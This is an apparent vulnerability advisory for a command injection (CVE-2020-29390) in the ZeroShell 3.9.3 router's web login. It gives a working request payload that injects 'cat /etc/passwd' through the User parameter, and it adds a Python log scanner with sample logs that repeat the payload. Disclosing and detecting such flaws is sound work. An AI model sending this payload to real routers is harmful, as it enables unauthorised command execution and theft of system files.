ZeroShell Linux Router 3.9.3 OS Command Injection vulnerability(CVE-2020-29390)


Vendor:

Zeroshell Linux Router

https://zeroshell.org/

Product:

ZeroShell-3.9.3-X86.iso

https://zeroshell.org/download/

Zeroshell is a Linux-based distribution dedicated to the implementation of router and firewall appliances that are completely administrable via a web interface. Zeroshell is available for x86/x86-64 platforms and ARM-based devices such as the Raspberry Pi.

OS Command Injection

When I reviewed the earlier vulnerabilities in Zeroshell, I discovered that an OS command injection vulnerability still exists in its latest version, which can be downloaded from the link above.

Payload: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=
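Added example, not part of the original advisory: a small Python helper that scans web-server access-log lines for the injection primitive described above, a newline (%0a) or other shell metacharacter inside the User parameter of a kerbynet StartSessionSubmit request. The log format, client IPs and sample lines are constructed assumptions, not real traffic.

```python
"""Detection helper for the Zeroshell kerbynet command-injection pattern.

Added example, not from the original advisory. It scans constructed
access-log lines for /cgi-bin/kerbynet login requests whose User
parameter carries a newline or other shell metacharacter.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Shell metacharacters that have no place in a login name.
_META = re.compile(r"[\n\r;|&`$(){}<>'\"\\]")

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2020:10:00:01 +0000] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=admin&PW= HTTP/1.1" 200 512
10.0.0.9 - - [01/Dec/2020:10:00:07 +0000] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1" 200 2048
10.0.0.9 - - [01/Dec/2020:10:00:09 +0000] "GET /cgi-bin/kerbynet?Action=Render&Object=Home HTTP/1.1" 200 1024
"""

# Pull the request target out of the quoted request line.
_REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_user_values(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, decoded User value) for every kerbynet
    StartSessionSubmit request whose User parameter contains shell
    metacharacters after percent-decoding."""
    hits = []
    for line in log_text.splitlines():
        m = _REQ.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/cgi-bin/kerbynet":
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("Action", [""])[0] != "StartSessionSubmit":
            continue
        for user in qs.get("User", []):
            # parse_qs already percent-decodes once; a second unquote
            # also catches double-encoded values such as %250a.
            decoded = unquote(user)
            if _META.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_user_values(SAMPLE_LOG):
        print(f"{ip}: User={value!r}")
```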
